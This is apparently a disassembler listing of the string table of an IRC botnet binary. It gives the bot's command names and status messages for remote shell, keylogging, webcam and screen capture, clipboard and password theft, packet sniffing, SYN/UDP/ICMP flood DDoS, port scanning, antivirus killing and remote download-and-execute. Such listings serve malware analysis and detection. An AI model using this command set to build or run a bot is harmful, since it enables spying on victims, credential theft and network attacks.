aSocks4ServerSt db '[SOCKS4]: Server started on: %s:%d.',0 ; DATA XREF: sub_409848+538A�o
; sub_41248E+A1�o
aFindfile_0 db '[FINDFILE]',0 ; DATA XREF: sub_409848+52BC�o
align 4
aFindFile db 'Find file',0 ; DATA XREF: sub_409848+52B7�o
align 10h
aProc db '[PROC]',0 ; DATA XREF: sub_409848+52A7�o
align 4
aProcessList db 'Process list',0 ; DATA XREF: sub_409848+52A2�o
align 4
aMainReconnecti db '[MAIN]: Reconnecting.',0 ; DATA XREF: sub_409848+526C�o
align 10h
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_409848:loc_40EAA7�o
align 4
aMainDisconnect db '[MAIN]: Disconnecting.',0 ; DATA XREF: sub_409848+524A�o
align 10h
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_409848:loc_40EA85�o
align 4
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_409848+5214�o
align 4
aMainStatusRead db '[MAIN]: Status: Ready. Bot Uptime: %s.',0 ; DATA XREF: sub_409848+51C6�o
align 4
aMainBotIdS_ db '[MAIN]: Bot ID: %s.',0 ; DATA XREF: sub_409848+5187�o
aThreadsFaile_0 db '[THREADS]: Failed to start list thread, error: <%d>.',0
; DATA XREF: sub_409848+515D�o
align 4
aThreadsListThr db '[THREADS]: List threads.',0 ; DATA XREF: sub_409848+5102�o
align 4
aSub db 'sub',0 ; DATA XREF: sub_409848+50E0�o
aMainAliasList_ db '[MAIN]: Alias list.',0 ; DATA XREF: sub_409848+508A�o
aLogFailedToSta db '[LOG]: Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_409848+505A�o
aLogListingLog_ db '[LOG]: Listing log.',0 ; DATA XREF: sub_409848+4FFF�o
aMainNetworkInf db '[MAIN]: Network Info.',0 ; DATA XREF: sub_409848+4F58�o
align 4
aMainSystemInfo db '[MAIN]: System Info.',0 ; DATA XREF: sub_409848+4F28�o
align 4
aMainRemovingBo db '[MAIN]: Removing Bot.',0 ; DATA XREF: sub_409848+4ED4�o
align 4
aProcsFailedToS db '[PROCS]: Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_409848+4E5E�o
align 4
aProcsProccessL db '[PROCS]: Proccess list.',0 ; DATA XREF: sub_409848+4DFD�o
aFull db 'full',0 ; DATA XREF: sub_409848+4DE1�o
align 4
aProcAlreadyRun db '[PROC]: Already running.',0 ; DATA XREF: sub_409848+4D7B�o
align 10h
aMainUptimeS_ db '[MAIN]: Uptime: %s.',0 ; DATA XREF: sub_409848+4D27�o
aCmdRemoteShe_0 db '[CMD]: Remote shell ready.',0 ; DATA XREF: sub_409848:loc_40E4E1�o
align 10h
aCmdCouldnTOpen db '[CMD]: Couldn',27h,'t open remote shell.',0
; DATA XREF: sub_409848+4C8F�o
align 4
aCmdRemoteShell db '[CMD]: Remote shell already running.',0 ; DATA XREF: sub_409848+4C70�o
align 4
aMainGetClipboa db '[MAIN]: Get Clipboard.',0 ; DATA XREF: sub_409848+4C5A�o
align 4
aClipboardData db '-[Clipboard Data]-',0 ; DATA XREF: sub_409848+4C2B�o
align 4
aFlushdnsFail_1 db '[FLUSHDNS]: Failed to flush ARP cache.',0
; DATA XREF: sub_409848:loc_40E461�o
align 10h
aFlushdnsArpC_0 db '[FLUSHDNS]: ARP cache flushed.',0 ; DATA XREF: sub_409848+4C04�o
align 10h
aFlushdnsFail_0 db '[FLUSHDNS]: Failed to load dnsapi.dll.',0
; DATA XREF: sub_409848:loc_40E430�o
align 4
aFlushdnsFailed db '[FLUSHDNS]: Failed to flush DNS cache.',0
; DATA XREF: sub_409848:loc_40E429�o
align 10h
aFlushdnsDnsCac db '[FLUSHDNS]: DNS cache flushed.',0 ; DATA XREF: sub_409848+4BDA�o
align 10h
aRlogindFailedT db '[RLOGIND]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_409848+4B6C�o
align 4
aRlogindServerL db '[RLOGIND]: Server listening on IP: %s:%d, Username: %s.',0
; DATA XREF: sub_409848+4B13�o
aHttpdFailedT_1 db '[HTTPD]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_409848+4A33�o
align 4
aTftpFailedTo_0 db '[TFTP]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_409848+48A9�o
aTftpAlreadyRun db '[TFTP]: Already running.',0 ; DATA XREF: sub_409848+478C�o
align 4
aFindpassFail_0 db '[FINDPASS]: Failed to start search thread, error: <%d>.',0
; DATA XREF: sub_409848+475E�o
aFindpassSearch db '[FINDPASS]: Searching for password.',0 ; DATA XREF: sub_409848+46FB�o
aScanFailedTo_1 db '[SCAN]: Failed to start scan, port is invalid.',0
; DATA XREF: sub_409848+46C0�o
; sub_409848+5DCC�o
align 8
aScanSPortScanS db '[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds '
; DATA XREF: sub_409848+45F8�o
; sub_409848+6023�o
db 'for %d minutes using %d threads.',0
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_409848+45CD�o
; sub_409848+5FF8�o
align 4
aRandom db 'Random',0 ; DATA XREF: sub_409848+45C6�o
; sub_409848+5FF1�o
align 10h
aScanAlreadyDSc db '[SCAN]: Already %d scanning threads. Too many specified.',0
; DATA XREF: sub_409848+43E9�o
; sub_409848+5C94�o
align 4
aMainNickChange db '[MAIN]: Nick changed to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409848+4385�o
align 4
aMainJoinedCh_0 db '[MAIN]: Joined channel: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409848+4368�o
align 4
aMainPartedChan db '[MAIN]: Parted channel: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409848+4347�o
align 4
aMainIrcRawS_ db '[MAIN]: IRC Raw: %s.',0 ; DATA XREF: sub_409848+432D�o
align 4
aThreadsFailedT db '[THREADS]: Failed to kill thread: %s.',0
; DATA XREF: sub_409848:loc_40DAFC�o
align 4
aThreadsKilledT db '[THREADS]: Killed thread: %s.',0 ; DATA XREF: sub_409848+42AD�o
align 4
aThreadsNoActiv db '[THREADS]: No active threads found.',0
; DATA XREF: sub_409848:loc_40DAB0�o
aThreadsStopped db '[THREADS]: Stopped: %d thread(s).',0 ; DATA XREF: sub_409848+425E�o
align 4
aAll db 'all',0 ; DATA XREF: sub_409848+4248�o
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_409848+41BB�o
; sub_409848:loc_40EA6E�o
align 4
aMainPrefixChan db '[MAIN]: Prefix changed to: ',27h,'%c',27h,'.',0
; DATA XREF: sub_409848+413A�o
align 4
aShellCouldnTOp db '[SHELL]: Couldn',27h,'t open file: %s',0
; DATA XREF: sub_409848:loc_40D969�o
aShellFileOpene db '[SHELL]: File opened: %s',0 ; DATA XREF: sub_409848+4117�o
align 4
aMainServerChan db '[MAIN]: Server changed to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409848+40E2�o
align 4
aDnsCouldnTReso db '[DNS]: Couldn',27h,'t resolve hostname.',0
; DATA XREF: sub_409848:loc_40D90A�o
align 10h
aDnsLookupSS_ db '[DNS]: Lookup: %s -> %s.',0 ; DATA XREF: sub_409848+4097�o
align 4
aProcFailedTo_0 db '[PROC]: Failed to terminate process: %s',0
; DATA XREF: sub_409848:loc_40D8AB�o
aProcProcessK_1 db '[PROC]: Process killed: %s',0 ; DATA XREF: sub_409848+405C�o
align 10h
aProcProcessK_0 db '[PROC]: Process killed & deleted: %s',0 ; DATA XREF: sub_409848+4014�o
align 4
aProcFailedToTe db '[PROC]: Failed to terminate process ID: %s',0
; DATA XREF: sub_409848:loc_40D7FD�o
align 4
aProcProcessKil db '[PROC]: Process killed ID: %s',0 ; DATA XREF: sub_409848+3FAE�o
align 4
aFileDeletedS_0 db '[FILE]: Deleted ',27h,'%s',27h,'.',0 ; DATA XREF: sub_409848+3F63�o
align 4
aFileListS db '[FILE]: List: %s',0 ; DATA XREF: sub_409848+3F3E�o
align 10h
aVisitFailedToS db '[VISIT]: Failed to start connection thread, error: <%d>.',0
; DATA XREF: sub_409848+3EFA�o
align 4
aVisitUrlS_ db '[VISIT]: URL: %s.',0 ; DATA XREF: sub_409848+3EA1�o
align 10h
aMircCommandSen db '[mIRC]: Command sent.',0 ; DATA XREF: sub_409848:loc_40D63C�o
align 4
aMircClientNotO db '[mIRC]: Client not open.',0 ; DATA XREF: sub_409848+3DED�o
align 4
aCmdCommandsS db '[CMD]: Commands: %s',0 ; DATA XREF: sub_409848+3DAD�o
aCmdErrorSendin db '[CMD]: Error sending to remote shell.',0 ; DATA XREF: sub_409848+3DA5�o
align 10h
aMainReadFileFa db '[MAIN]: Read file failed: %s',0 ; DATA XREF: sub_409848+3D57�o
align 10h
aMainReadFileCo db '[MAIN]: Read file complete: %s',0 ; DATA XREF: sub_409848+3D41�o
align 10h
aCaptureInval_0 db '[CAPTURE]: Invalid parameters for amateur video capture.',0
; DATA XREF: sub_409848:loc_40D50E�o
align 4
aCaptureError_1 db '[CAPTURE]: Error while capturing amateur video from webcam.',0
; DATA XREF: sub_409848:loc_40D504�o
aCaptureAmateur db '[CAPTURE]: Amateur video saved to: %s.',0 ; DATA XREF: sub_409848+3CA9�o
align 10h
aVideo db 'video',0 ; DATA XREF: sub_409848+3C1E�o
align 4
aCaptureInvalid db '[CAPTURE]: Invalid parameters for webcam capture.',0
; DATA XREF: sub_409848:loc_40D44E�o
align 4
aCaptureError_0 db '[CAPTURE]: Error while capturing from webcam.',0
; DATA XREF: sub_409848:loc_40D447�o
align 4
aCaptureWebcamC db '[CAPTURE]: Webcam capture saved to: %s.',0 ; DATA XREF: sub_409848+3BEF�o
aFrame db 'frame',0 ; DATA XREF: sub_409848+3B82�o
align 4
aCaptureDriverL db '[CAPTURE]: Driver list complete.',0 ; DATA XREF: sub_409848+3B70�o
align 10h
aCaptureDriverD db '[CAPTURE]: Driver #%d - %s - %s.',0 ; DATA XREF: sub_409848+3B3C�o
align 4
aDrivers db 'drivers',0 ; DATA XREF: sub_409848+3AF5�o
aCaptureNoFilen db '[CAPTURE]: No filename specified for screen capture.',0
; DATA XREF: sub_409848:loc_40D325�o
align 4
aCaptureErrorWh db '[CAPTURE]: Error while capturing screen.',0
; DATA XREF: sub_409848:loc_40D31E�o
align 10h
aCaptureScreenC db '[CAPTURE]: Screen capture saved to: %s.',0 ; DATA XREF: sub_409848+3AC6�o
aScreen db 'screen',0 ; DATA XREF: sub_409848+3A9C�o
align 10h
aMainGethostS_ db '[MAIN]: Gethost: %s.',0 ; DATA XREF: sub_409848+3A7F�o
align 4
aMainUnableToEx db '[MAIN]: Unable to extract Gethost command.',0
; DATA XREF: sub_409848:loc_40D283�o
align 4
aMainGethostSCo db '[MAIN]: Gethost: %s, Command: %s',0 ; DATA XREF: sub_409848+3A25�o
align 4
aMainAliasAdded db '[MAIN]: Alias added: %s.',0 ; DATA XREF: sub_409848+3970�o
align 4
aMainPrivmsgSS_ db '[MAIN]: Privmsg: %s: %s.',0 ; DATA XREF: sub_409848+392D�o
align 10h
aMainActionSS_ db '[MAIN]: Action: %s: %s.',0 ; DATA XREF: sub_409848+38C2�o
aMainCycle_ db '[MAIN]: Cycle.',0 ; DATA XREF: sub_409848+3842�o
align 4
aPartS db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_409848+3806�o
; sub_409848+4337�o
align 4
aMainModeChange db '[MAIN]: Mode change: %s',0 ; DATA XREF: sub_409848+37E1�o
aModeS_0 db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_409848+37D3�o
align 4
aCloneRawSS db '[CLONE]: Raw (%s): %s',0 ; DATA XREF: sub_409848+37A7�o
align 10h
aCloneModeSS db '[CLONE]: Mode (%s): %s',0 ; DATA XREF: sub_409848+3738�o
align 4
aModeS db 'MODE %s',0 ; DATA XREF: sub_409848+36E0�o
aCloneNickSS db '[CLONE]: Nick (%s): %s',0 ; DATA XREF: sub_409848+36AD�o
align 4
aNickS db 'NICK %s',0 ; DATA XREF: sub_409848+3654�o
; sub_409848+4182�o
aJoinSS db 'JOIN %s %s',0 ; DATA XREF: sub_409848+3633�o
align 4
aS_4 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_409848+35FF�o
; sub_409848+368C�o ...
align 4
aPartS_0 db 'PART %s',0 ; DATA XREF: sub_409848+35C6�o
aMainRepeatNotA db '[MAIN]: Repeat not allowed in command line: %s',0
; DATA XREF: sub_409848:loc_40CDFB�o
align 4
aMainRepeatS db '[MAIN]: Repeat: %s',0 ; DATA XREF: sub_409848+3578�o
align 10h
aMainDelay_ db '[MAIN]: Delay.',0 ; DATA XREF: sub_409848:loc_40CD2D�o
align 10h
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_409848+34A1�o
; sub_409848+3552�o ...
align 10h
aUpdateFailedTo db '[UPDATE]: Failed to start download thread, error: <%d>.',0
; DATA XREF: sub_409848+3418�o
aUpdateDownload db '[UPDATE]: Downloading update from: %s.',0 ; DATA XREF: sub_409848+33B9�o
align 10h
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_409848+3312�o
align 4
aExecCommandsS db '[EXEC]: Commands: %s',0 ; DATA XREF: sub_409848+328E�o
align 4
aExecCouldnTExe db '[EXEC]: Couldn',27h,'t execute file.',0 ; DATA XREF: sub_409848+327B�o
align 4
aFindfileFailed db '[FINDFILE]: Failed to start search thread, error: <%d>.',0
; DATA XREF: sub_409848+31C7�o
aFindfileSear_0 db '[FINDFILE]: Searching for file: %s in: %s.',0
; DATA XREF: sub_409848+3163�o
align 4
aFile_0 db '[FILE]:',0 ; DATA XREF: sub_409848:loc_40C909�o
; sub_409848:loc_40D7B2�o
aFileRenameSToS db '[FILE]: Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409848+30A9�o
align 10h
aIcmpInvalidFlo db '[ICMP]: Invalid flood time must be greater than 0.',0
; DATA XREF: sub_409848+3060�o
align 4
aIcmpFailedToSt db '[ICMP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409848+3038�o
align 4
aIcmpFloodingSF db '[ICMP]: Flooding: (%s) for %s seconds.',0 ; DATA XREF: sub_409848+2FC8�o
align 10h
aClonesFailedTo db '[CLONES]: Failed to start clone thread, error: <%d>.',0
; DATA XREF: sub_409848+2F3C�o
align 4
aClonesCreatedO db '[CLONES]: Created on %s:%d, in channel %s.',0
; DATA XREF: sub_409848+2ED9�o
align 4
aDdosFailedToSt db '[DDoS]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409848+2E29�o
align 4
aDdosFloodingSS db '[DDoS]: Flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_409848+2DBF�o
align 4
aSynFailedToSta db '[SYN]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409848+2D2B�o
align 4
aSynFloodingSSF db '[SYN]: Flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_409848+2CC1�o
align 4
aDownloadFailed db '[DOWNLOAD]: Failed to start transfer thread, error: <%d>.',0
; DATA XREF: sub_409848+2C19�o
align 10h
aDownloadDown_1 db '[DOWNLOAD]: Downloading URL: %s to: %s.',0 ; DATA XREF: sub_409848+2BBA�o
aRedirectFailed db '[REDIRECT]: Failed to start redirection thread, error: <%d>.',0
; DATA XREF: sub_409848+2A9C�o
align 4
aRedirectTcpRed db '[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.',0
; DATA XREF: sub_409848+2A41�o
aScanFailedTo_0 db '[SCAN]: Failed to start scan thread, error: <%d>.',0
; DATA XREF: sub_409848+299F�o
; sub_409848+4657�o ...
align 4
aScanPortScanSt db '[SCAN]: Port scan started: %s:%d with delay: %d(ms).',0
; DATA XREF: sub_409848+2944�o
align 4
aSSS_1 db '[%s] <%s> %s',0 ; DATA XREF: sub_409848+28BE�o
align 4
aSSS_2 db '[%s] * %s %s',0 ; DATA XREF: sub_409848+27A3�o
align 4
dword_429D4C dd 54434101h, 204E4F49h, 17325h ; sub_409848+389D�o
dword_429D58 dd 615F63h aC_action db 'c_action',0 ; DATA XREF: sub_409848+267E�o
align 4
aC_pm db 'c_pm',0 ; DATA XREF: sub_409848+266A�o
align 10h
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_409848+2656�o
align 4
aSc db 'sc',0 ; DATA XREF: sub_409848+2642�o
align 10h
aScan db 'scan',0 ; DATA XREF: sub_409848+262E�o
align 4
aRd db 'rd',0 ; DATA XREF: sub_409848+261A�o
align 4
aRedirect db 'redirect',0 ; DATA XREF: sub_409848+2606�o
align 4
aDl db 'dl',0 ; DATA XREF: sub_409848+25F2�o
align 4
aDownload db 'download',0 ; DATA XREF: sub_409848+25DE�o
align 4
aSyn db 'syn',0 ; DATA XREF: sub_409848+25CA�o
; sub_409848+584B�o ...
aSynflood db 'synflood',0 ; DATA XREF: sub_409848+25B6�o
align 4
aC: ; DATA XREF: sub_409848+2566�o
; sub_415F00+73�o
unicode 0, <c>,0
aClone_0 db 'clone',0 ; DATA XREF: sub_409848+2552�o
align 4
aIcmp db 'icmp',0 ; DATA XREF: sub_409848+252C�o
align 4
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_409848+2518�o
align 4
aMv db 'mv',0 ; DATA XREF: sub_409848+2504�o
align 4
aRename db 'rename',0 ; DATA XREF: sub_409848+24F0�o
align 4
aFf db 'ff',0 ; DATA XREF: sub_409848+24DC�o
align 4
aFindfile db 'findfile',0 ; DATA XREF: sub_409848+24C8�o
align 4
aE: ; DATA XREF: sub_409848+24B4�o
unicode 0, <e>,0
aExecute db 'execute',0 ; DATA XREF: sub_409848+24A0�o
aUpdate db 'update',0 ; DATA XREF: sub_409848+2478�o
align 4
aDe db 'de',0 ; DATA XREF: sub_409848+2464�o
align 4
aDelay db 'delay',0 ; DATA XREF: sub_409848+2450�o
align 4
aRp db 'rp',0 ; DATA XREF: sub_409848+243C�o
align 4
aRepeat db 'repeat',0 ; DATA XREF: sub_409848+2428�o
; sub_409848+3530�o
align 10h
aC_p db 'c_p',0 ; DATA XREF: sub_409848+2414�o
aC_part db 'c_part',0 ; DATA XREF: sub_409848+2400�o
align 4
aC_j db 'c_j',0 ; DATA XREF: sub_409848+23EC�o
aC_join db 'c_join',0 ; DATA XREF: sub_409848+23D8�o
align 4
aC_n db 'c_n',0 ; DATA XREF: sub_409848+23C4�o
aC_nick db 'c_nick',0 ; DATA XREF: sub_409848+23B0�o
align 4
aC_m db 'c_m',0 ; DATA XREF: sub_409848+239C�o
aC_mode db 'c_mode',0 ; DATA XREF: sub_409848+2388�o
align 10h
aC_r db 'c_r',0 ; DATA XREF: sub_409848+2374�o
aC_raw db 'c_raw',0 ; DATA XREF: sub_409848+2360�o
align 4
aM: ; DATA XREF: sub_409848+234C�o
unicode 0, <m>,0
aMode db 'mode',0 ; DATA XREF: sub_409848+2338�o
align 4
aCy db 'cy',0 ; DATA XREF: sub_409848+2324�o
align 4
aCycle db 'cycle',0 ; DATA XREF: sub_409848+2310�o
align 4
aA_1: ; DATA XREF: sub_409848+22FC�o
unicode 0, <a>,0
aAction db 'action',0 ; DATA XREF: sub_409848+22E8�o
align 10h
aPm_0 db 'pm',0 ; DATA XREF: sub_409848+22D4�o
align 4
aPrivmsg_0 db 'privmsg',0 ; DATA XREF: sub_409848+22C0�o
aAa db 'aa',0 ; DATA XREF: sub_409848+22AC�o
align 10h
aAddalias db 'addalias',0 ; DATA XREF: sub_409848+2298�o
align 4
aAvfwFailedToSt db '[AVFW]: Failed to start AV/FW killer thread, error: <%d>.',0
; DATA XREF: sub_409848+2220�o
align 4
aAvfw db '[AVFW]',0 ; DATA XREF: sub_409848+21C6�o
; sub_409848+2278�o
align 10h
aKillerThread db 'Killer Thread',0 ; DATA XREF: sub_409848+21C1�o
; sub_409848+2273�o
align 10h
aAvfwAvFwBotKil db '[AVFW]: AV/FW/BOT Killer active.',0 ; DATA XREF: sub_409848+21AB�o
align 4
aAvfwkiller db 'avfwkiller',0 ; DATA XREF: sub_409848+2180�o
align 10h
aGh db 'gh',0 ; DATA XREF: sub_409848+216C�o
align 4
aGethost db 'gethost',0 ; DATA XREF: sub_409848+2158�o
aCap db 'cap',0 ; DATA XREF: sub_409848+2144�o
aCapture db 'capture',0 ; DATA XREF: sub_409848+2130�o
aNetCommandUnkn db '[NET]: Command unknown.',0 ; DATA XREF: sub_409848:loc_40B950�o
aNetNoMessageSp db '[NET]: No message specified.',0 ; DATA XREF: sub_409848:loc_40B949�o
align 10h
aNetUserListFai db '[NET]: User list failed.',0 ; DATA XREF: sub_409848:loc_40B902�o
align 4
aNetUserListCom db '[NET]: User list completed.',0 ; DATA XREF: sub_409848+20B3�o
aNetShareListFa db '[NET]: Share list failed.',0 ; DATA XREF: sub_409848:loc_40B863�o
align 4
aNetShareListCo db '[NET]: Share list completed.',0 ; DATA XREF: sub_409848+2011�o
align 4
aShare db 'share',0 ; DATA XREF: sub_409848+1FA5�o
align 4
aContinue db 'continue',0 ; DATA XREF: sub_409848+1F71�o
align 4
aPause db 'pause',0 ; DATA XREF: sub_409848+1F5A�o
align 10h
aStop db 'stop',0 ; DATA XREF: sub_409848+1F43�o
; sub_409848+225A�o
align 4
aNetServiceLi_0 db '[NET]: Service list failed.',0 ; DATA XREF: sub_409848:loc_40B77D�o
aNetServiceList db '[NET]: Service list completed.',0 ; DATA XREF: sub_409848+1F2B�o
align 4
aStart db 'start',0 ; DATA XREF: sub_409848+1ED8�o
; sub_409848+2195�o
align 4
aNetFailedToLoa db '[NET]: Failed to load advapi32.dll or netapi32.dll.',0
; DATA XREF: sub_409848+1E9E�o
aNet db 'net',0 ; DATA XREF: sub_409848+1E7C�o
aKeylogFailedTo db '[KEYLOG]: Failed to start logging thread, error: <%d>.',0
; DATA XREF: sub_409848+1E59�o
align 4
aKeylogKeyLog_0 db '[KEYLOG]: Key logger active.',0 ; DATA XREF: sub_409848+1DFE�o
align 4
aKeylogAlreadyR db '[KEYLOG]: Already running.',0 ; DATA XREF: sub_409848+1D7D�o
align 4
aKeylogNoKeyLog db '[KEYLOG]: No key logger thread found.',0
; DATA XREF: sub_409848:loc_40B5A1�o
align 10h
aKeylogKeyLogge db '[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)',0
; DATA XREF: sub_409848+1D4F�o
align 4
aFile db 'file',0 ; DATA XREF: sub_409848+1D1F�o
; sub_409848+1D9B�o
align 10h
aKeylog db 'keylog',0 ; DATA XREF: sub_409848+1CF9�o
align 4
aPsniffNoCarniv db '[PSNIFF]: No Carnivore thread found.',0
; DATA XREF: sub_409848:loc_40B536�o
align 10h
aPsniffCarniv_0 db '[PSNIFF]: Carnivore stopped. (%d thread(s) stopped.)',0
; DATA XREF: sub_409848+1CE4�o
align 4
aOff db 'off',0 ; DATA XREF: sub_409848+1CC5�o
; sub_409848+1D30�o
aPsniffFailedTo db '[PSNIFF]: Failed to start sniffer thread, error: <%d>.',0
; DATA XREF: sub_409848+1CB6�o
align 4
aPsniffCarnivor db '[PSNIFF]: Carnivore packet sniffer active.',0
; DATA XREF: sub_409848+1C39�o
align 10h
aPsniffAlreadyR db '[PSNIFF]: Already running.',0 ; DATA XREF: sub_409848+1BD2�o
align 4
aOn db 'on',0 ; DATA XREF: sub_409848+1BB6�o
; sub_409848+1D0E�o
align 10h
aPsniff db 'psniff',0 ; DATA XREF: sub_409848+1BA1�o
align 4
aRf db 'rf',0 ; DATA XREF: sub_409848+1B8D�o
align 4
aReadfile db 'readfile',0 ; DATA XREF: sub_409848+1B79�o
align 4
aCm db 'cm',0 ; DATA XREF: sub_409848+1B65�o
align 4
aCmd db 'cmd',0 ; DATA XREF: sub_409848+1B51�o
aMirc db 'mirc',0 ; DATA XREF: sub_409848+1B3D�o
align 4
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_409848+1B29�o
aV: ; DATA XREF: sub_409848+1B15�o
unicode 0, <v>,0
aVisit db 'visit',0 ; DATA XREF: sub_409848+1B01�o
align 4
aLi db 'li',0 ; DATA XREF: sub_409848+1AED�o
align 10h
aList_0 db 'list',0 ; DATA XREF: sub_409848+1AD9�o
align 4
aDel db 'del',0 ; DATA XREF: sub_409848+1AC5�o
aDelete db 'delete',0 ; DATA XREF: sub_409848+1AB1�o
; sub_409848+1F8B�o
align 4
aKi db 'ki',0 ; DATA XREF: sub_409848+1A9D�o
align 4
aKill db 'kill',0 ; DATA XREF: sub_409848+1A89�o
align 10h
aKdp db 'kdp',0 ; DATA XREF: sub_409848+1A75�o
aKilldelproc db 'killdelproc',0 ; DATA XREF: sub_409848+1A61�o
aKp db 'kp',0 ; DATA XREF: sub_409848+1A4D�o
align 4
aKillproc db 'killproc',0 ; DATA XREF: sub_409848+1A39�o
align 10h
aDn db 'dn',0 ; DATA XREF: sub_409848+1A25�o
align 4
aDns db 'dns',0 ; DATA XREF: sub_409848+1A11�o
aSe db 'se',0 ; DATA XREF: sub_409848+19FD�o
align 4
aO: ; DATA XREF: sub_409848+19D5�o
unicode 0, <o>,0
aOpen db 'open',0 ; DATA XREF: sub_409848+19C1�o
; sub_409848+40FE�o ...
align 4
aPr db 'pr',0 ; DATA XREF: sub_409848+19AD�o
align 4
aPrefix db 'prefix',0 ; DATA XREF: sub_409848+1999�o
align 4
aC_rn db 'c_rn',0 ; DATA XREF: sub_409848+1985�o
align 4
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_409848+1971�o
align 4
aC_q db 'c_q',0 ; DATA XREF: sub_409848+195D�o
aC_quit db 'c_quit',0 ; DATA XREF: sub_409848+1949�o
align 4
aK: ; DATA XREF: sub_409848+1935�o
unicode 0, <k>,0
aKillthread db 'killthread',0 ; DATA XREF: sub_409848+1921�o
align 4
aRaw db 'raw',0 ; DATA XREF: sub_409848+18F9�o
aPt db 'pt',0 ; DATA XREF: sub_409848+18E5�o
align 4
aPart_0 db 'part',0 ; DATA XREF: sub_409848+18D1�o
align 4
aJ: ; DATA XREF: sub_409848+18BD�o
unicode 0, <j>,0
aJoin db 'join',0 ; DATA XREF: sub_409848+18A9�o
align 10h
aN: ; DATA XREF: sub_409848+1895�o
unicode 0, <n>,0
aNick_0 db 'nick',0 ; DATA XREF: sub_409848+1881�o
align 4
aScanall db 'scanall',0 ; DATA XREF: sub_409848+1847�o
aFp db 'fp',0 ; DATA XREF: sub_409848+1833�o
align 4
aFindpass db 'findpass',0 ; DATA XREF: sub_409848+181F�o
align 4
aTftp db 'tftp',0 ; DATA XREF: sub_409848+180B�o
align 4
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_409848+17F7�o
align 4
aHttp db 'http',0 ; DATA XREF: sub_409848+17E3�o
align 10h
aHttpserver db 'httpserver',0 ; DATA XREF: sub_409848+17CF�o
align 4
aRlogin db 'rlogin',0 ; DATA XREF: sub_409848+17BB�o
align 4
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_409848+17A7�o
align 4
aCip db 'cip',0 ; DATA XREF: sub_409848+1793�o
aCurrentip db 'currentip',0 ; DATA XREF: sub_409848+177F�o
align 4
aFdns db 'fdns',0 ; DATA XREF: sub_409848+176B�o
align 4
aFlushdns db 'flushdns',0 ; DATA XREF: sub_409848+1757�o
align 4
aFarp db 'farp',0 ; DATA XREF: sub_409848+1743�o
align 10h
aFlusharp db 'flusharp',0 ; DATA XREF: sub_409848+172F�o
align 4
aGc db 'gc',0 ; DATA XREF: sub_409848+171B�o
align 10h
aGetclip db 'getclip',0 ; DATA XREF: sub_409848+1707�o
aEmailMessageSe db '[EMAIL]: Message sent to %s.',0 ; DATA XREF: sub_409848+16BD�o
align 4
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_409848+163C�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
a_: ; DATA XREF: sub_409848+159C�o
unicode 0, <_>,0
aEmail db 'email',0 ; DATA XREF: sub_409848+1531�o
align 10h
aTcp db 'tcp',0 ; DATA XREF: sub_409848+151D�o
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_409848+1509�o
align 10h
aP: ; DATA XREF: sub_409848+14F5�o
unicode 0, <p>,0
aPing_0 db 'ping',0 ; DATA XREF: sub_409848+14E1�o
align 4
aPingflood db 'pingflood',0 ; DATA XREF: sub_409848+14CD�o
align 4
aU: ; DATA XREF: sub_409848+14B9�o
unicode 0, <u>,0
aUdp db 'udp',0 ; DATA XREF: sub_409848+14A5�o
aUdpflood db 'udpflood',0 ; DATA XREF: sub_409848+1491�o
align 4
aAsc db 'asc',0 ; DATA XREF: sub_409848+147D�o
aAdvscan db 'advscan',0 ; DATA XREF: sub_409848+1469�o
aMainLoginListC db '[MAIN]: Login list complete.',0 ; DATA XREF: sub_409848+1445�o
align 4
aD_S db '%d. %s',0 ; DATA XREF: sub_409848+1411�o
; sub_41379D+46�o
align 10h
aEmpty db '<Empty>',0 ; DATA XREF: sub_409848+1404�o
aLoginList db '-[Login List]-',0 ; DATA XREF: sub_409848+13E1�o
align 4
aWho db 'who',0 ; DATA XREF: sub_409848+13C8�o
aCmd_0 db '[CMD]',0 ; DATA XREF: sub_409848+13BA�o
align 4
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_409848+13B5�o
align 4
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_409848+13A0�o
aOcmd db 'ocmd',0 ; DATA XREF: sub_409848+138C�o
align 4
aOpencmd db 'opencmd',0 ; DATA XREF: sub_409848+1378�o
aDll db 'dll',0 ; DATA XREF: sub_409848+1364�o
aTestdlls db 'testdlls',0 ; DATA XREF: sub_409848+1350�o
align 4
